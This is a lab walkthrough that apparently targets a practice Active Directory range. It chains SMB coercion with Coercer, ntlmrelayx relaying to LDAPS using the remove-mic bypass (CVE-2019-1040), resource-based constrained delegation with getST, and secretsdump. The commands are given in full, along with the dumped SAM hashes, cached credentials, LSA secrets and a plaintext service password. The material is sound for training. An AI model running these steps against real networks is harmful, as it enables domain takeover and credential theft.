Coerced auth smb + ntlmrelayx to ldaps with drop the mic

We can coerce a connection from Baltimore DC to our host using multiple methods (petitpotam, printerbug, DFSCoerce). To force a coerce without choosing between the different methods, we can use the all-in-one tool who just came up coercer

As explained beautifully in the hackndo blog (en.hackndo.com/ntlm-relay) and in the hacker receipe (www.thehacker.recipes/ad/movement/ntlm/relay), you can’t relay smb connection to ldap(s) connection without using CVE-2019-1040 a.k.a remove-mic.

  • Start the relay with remove mic to the ldaps of baltimore.maryland.local.

  • Run the coerce authentication on Salsibury(Salisbury is a windows server 2016 up to date so petitpotam unauthenticated will not work here)

Installation

sudo python3 -m pip install coercer

Collecting coercer
  Downloading coercer-2.4-py3-none-any.whl (49 kB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 49.1/49.1 kB 136.3 kB/s eta 0:00:00
Requirement already satisfied: xlsxwriter in /usr/lib/python3/dist-packages (from coercer) (3.0.2)
Requirement already satisfied: impacket in /usr/lib/python3/dist-packages (from coercer) (0.10.0)
Requirement already satisfied: jinja2 in /usr/lib/python3/dist-packages (from coercer) (3.0.3)
Requirement already satisfied: dsinternals in /usr/lib/python3/dist-packages (from impacket->coercer) (1.2.4)
Installing collected packages: coercer
Successfully installed coercer-2.4
 
 *] Servers started, waiting for connections
[*] SMBD-Thread-5: Received connection from 192.168.56.23, attacking target ldaps://baltimore.maryland.local
[*] Authenticating against ldaps://baltimore.maryland.local as MARYLAND/SALISBURY$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] SMBD-Thread-7: Connection from 192.168.56.23 controlled, but there are no more targets left!
[*] Attempting to create computer in: CN=Computers,DC=maryland,DC=local
[*] Adding new computer with username: removemiccomputer$ and password: *mHcnugW1<KF8Oq result: OK
[*] Delegation rights modified succesfully!
[*] removemiccomputer$ can now impersonate users on SALISBURY$ via S4U2Proxy

Start the Relay

sudo ntlmrelayx.py -t ldaps://baltimore.maryland.local -smb2support --remove-mic --add-computer removemiccomputer --delegate-access

LEt's corece

Coercer coerce -u joaquin.Pereida -d maryland.local -p horse -t salisbury.maryland.local -l 192.168.56.31

  • The attack worked we can now exploit Salisbury with RBCD by getting the service principal name -spn for Administrator

sudo getST.py -spn HOST/salisbury.maryland.local -impersonate Administrator -dc-ip 192.168.56.12 'MARYLAND.LOCAL/removemiccomputer$:*mHcnugW1<KF8Oq'
Impacket v0.10.1.dev1+20230216.13520.d4c06e7f - Copyright 2022 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*]     Requesting S4U2self
[*]     Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache

  • and use that ticket to retrieve dump the sam database from Salisbury Server..

export KRB5CCNAME=/workspace/Administrator.ccache
secretsdump.py -k -no-pass MARYLAND.LOCAL/'Administrator'@salisbury.maryland.local'




Impacket v0.10.1.dev1+20230216.13520.d4c06e7f - Copyright 2022 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x3e6d1ece16a534e660a94480bd6f2a32
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:84fe45d7c3263065e931761aef6c7aaf:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
[*] Dumping cached domain logon information (domain/username:hash)
MARYLAND.LOCAL/sql_svc:$DCC2$10240#sql_svc#89e701ebbd305e4f5380c5150494584a
MARYLAND.LOCAL/joaquin.Pereida:$DCC2$10240#joaquin.Pereida#39dfbbbb2ff73c019c37498e96708c37
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
maryland\SALISBURY$:plain_password_hex:2100480079004f0060003800600078002b006300270058003e0056004f003c003c004a005100520039005e007a0043005b004d0038005000390073004b00780057003e004800300026004c003b0040004300330055003b00450045006900260046006400700031004c002e00450028002300290045006e0074003d005f005500550051002300760073004a0031002b0078004c0055002100500043004f005b00380072006b005a002d0055002000230032005e004d005a006a006900470044002e0066003c003a0040004b00310079002f0075002e0078005a0063002a002f00690052006f0034003800700041003800
maryland\SALISBURY$:aad3b435b51404eeaad3b435b51404ee:12df918c6cba0ab538b68f10071a1fa5:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x0810ead1cae293ee405b7051a9d3a3a3b8afbc0b
dpapi_userkey:0x39f7f79d4d6d8889ba4f1c5bf55a42429702eded
[*] NL$KM 
 0000   26 72 00 BB 64 CB DD D7  34 20 B4 AC 7E 9A 99 05   &r..d...4 ..~...
 0010   75 95 40 EF C7 ED 72 3E  F4 66 93 E7 3D C9 B8 56   u.@...r>.f..=..V
 0020   EC E8 6E 4E 40 13 86 34  A8 F6 E6 36 C6 71 9F 7A   ..nN@..4...6.q.z
 0030   8F 63 A3 23 D9 37 A0 BC  07 C0 0B 06 41 21 5E 64   .c.#.7......A!^d
NL$KM:267200bb64cbddd73420b4ac7e9a9905759540efc7ed723ef46693e73dc9b856ece86e4e40138634a8f6e636c6719f7a8f63a323d937a0bc07c00b0641215e64
[*] _SC_MSSQL$SQLEXPRESS 
maryland.local\sql_svc:YouWillNotKerboroast1ngMeeeeee
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
PreviousPass the Hash with CrackMapExecNextUser Enumeration Exploit

Last updated